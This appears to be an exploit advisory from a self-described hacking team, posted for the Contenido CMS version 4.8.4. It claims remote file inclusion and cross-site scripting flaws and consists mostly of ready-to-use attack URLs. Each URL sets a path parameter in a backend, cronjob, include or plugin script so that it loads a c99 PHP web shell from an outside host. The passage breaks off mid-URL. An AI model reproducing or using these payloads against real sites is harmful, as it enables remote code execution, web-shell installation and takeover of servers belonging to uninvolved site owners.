1 # Script Name : Contenido
2
3 # Type Of Script : Content−Management
4
5 # Version : 4.8.4 May Be Older Is Infected I Don,t See !!!
6
7 # Download From : http://www.contenido.org/en/upload/versionen/Contenido_4.8.4.zip
8
9 # Found : RoMaNcYxHaCkEr [ RoMaNTiC−TeaM ]
10
11 # My Homepage : WwW.4RxH.CoM & Member From Tryag Forum [ We Will Be Back Soon ]
12
13 # Type Of Exploits : Multiple Remote Vulne [ RFI + XSS ]
14
15 # Exploits:
16
17 − This Multiple RFI In Different Files :
18
19 http://WwW.4RxH.CoM/Contenido_4.8.4/contenido/backend_search.php?contenido_path=http://rxh.freehostia.com/shells/c99i
n.txt?
20
21 http://WwW.4RxH.CoM/Contenido_4.8.4/contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://rxh.freehostia.c
om/shells/c99in.txt?
22
23 http://WwW.4RxH.CoM/Contenido_4.8.4/contenido/cronjobs/move_old_stats.php?cfg[path][contenido]=http://rxh.freehostia.
com/shells/c99in.txt?
24
25 http://WwW.4RxH.CoM/Contenido_4.8.4/contenido/cronjobs/optimize_database.php?cfg[path][contenido]=http://rxh.freehost
ia.com/shells/c99in.txt?
26
27 http://WwW.4RxH.CoM/Contenido_4.8.4/contenido/cronjobs/run_newsletter_job.php?cfg[path][contenido]=http://rxh.freehos
tia.com/shells/c99in.txt?
28
29 http://WwW.4RxH.CoM/Contenido_4.8.4/contenido/cronjobs/send_reminder.php?cfg[path][contenido]=http://rxh.freehostia.c
om/shells/c99in.txt?
30
31 http://WwW.4RxH.CoM/Contenido_4.8.4/contenido/cronjobs/session_cleanup.php?cfg[path][contenido]=http://rxh.freehostia
.com/shells/c99in.txt?
32
33 http://WwW.4RxH.CoM/Contenido_4.8.4/contenido/cronjobs/setfrontenduserstate.php?cfg[path][contenido]=http://rxh.freeh
ostia.com/shells/c99in.txt?
34
35 http://WwW.4RxH.CoM/Contenido_4.8.4/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][templates]=http:/
/rxh.freehostia.com/shells/c99in.txt?
36
37 http://WwW.4RxH.CoM/Contenido_4.8.4/contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][tem
plates]=http://rxh.freehostia.com/shells/c99in.txt?
38
39 http://WwW.4RxH.CoM/Contenido_4.8.4/cont